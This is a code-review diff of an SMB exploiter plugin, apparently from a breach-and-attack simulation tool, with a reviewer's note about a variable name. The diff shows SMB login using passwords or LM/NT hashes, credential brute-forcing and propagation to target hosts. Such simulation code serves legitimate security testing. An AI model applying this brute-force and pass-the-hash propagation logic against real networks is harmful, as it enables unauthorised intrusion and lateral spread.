monkey/agent_plugins/exploiters/smb/src/smb_exploiter.py

```diff
@@ -1,305 +1,96 @@
+            return ExploiterResultData()
 
-def secret_for_type(credentials: Credentials, secret_type: Type) -> str:
-    return get_plaintext(credentials.secret) if type(credentials.secret) == secret_type else ""
-
-
-class SMB:
-    @classmethod
-    def create_connection(self, host: TargetHost) -> SMBConnection:
-        # Create a SMB connection with the credentials
         try:
-            return SMBConnection(
-                str(host.ip), str(host.ip), sess_port=445, preferredDialect=SMB_DIALECT
-            )
+            credentials = self._exploit(host, options, interrupt)
         except Exception as err:
-            logger.debug(
-                f"Failed to create SMB connection to {host} on port 445. Trying port 139: {err}"
-            )
-
-            try:
-                return SMBConnection("*SMBSEVER", str(host.ip), sess_port=139)
-            except Exception as err:
-                logger.debug(f"Failed to create SMB connection to {host} on port 139: {err}")
-                return None
+            logger.exception(f"Failed to exploit {host}: {err}")
+            return ExploiterResultData()
+        if not credentials:
+            return ExploiterResultData()
 
-    @classmethod
-    def get_dialect(self, smb: SMBConnection) -> str:
-        return {
-            SMB_DIALECT: "SMBv1",
-            SMB2_DIALECT_002: "SMBv2.0",
-            SMB2_DIALECT_21: "SMBv2.1",
-        }.get(smb.getDialect(), "SMBv3.0")
-
-    @classmethod
-    def login(self, smb: SMBConnection, credentials: Credentials) -> bool:
-        """True if login succeeded, False otherwise"""
         try:
-            smb.login(
-                credentials.identity,
-                secret_for_type(credentials, Password),
-                "",
-                secret_for_type(credentials, LMHash),
-                secret_for_type(credentials, NTHash),
+            propagated = self._propagate(
+                host, options, credentials, servers, current_depth, interrupt
             )
+            return ExploiterResultData(exploitation_success=True, propagation_success=propagated)
         except Exception as err:
-            logger.debug(f"Failed to login to with user {credentials.identity}: {err}")
-            return False
-        return True
+            logger.exception(f"Failed to propagate to {host}: {err}")
+            return ExploiterResultData(exploitation_success=True)
 
-    @classmethod
-    def logout_guest(self, smb: SMBConnection) -> bool:
-        if smb.isGuestSession() > 0:
-            try:
-                smb.logoff()
-            except Exception:
-                # TODO: If we failed to logout, we should handle that
-                pass
+    def _exploit(
+        self, host: TargetHost, options: SMBOptions, interrupt: Event
+    ) -> Optional[Credentials]:
+        credentials = self._propagation_credentials_repository.get_credentials()
+        credentials_list = generate_brute_force_credentials(credentials)
```

Comment:
Let's not use "list" in the variable name.
```suggestion
        credential_combinations = generate_brute_force_credentials(credentials)
```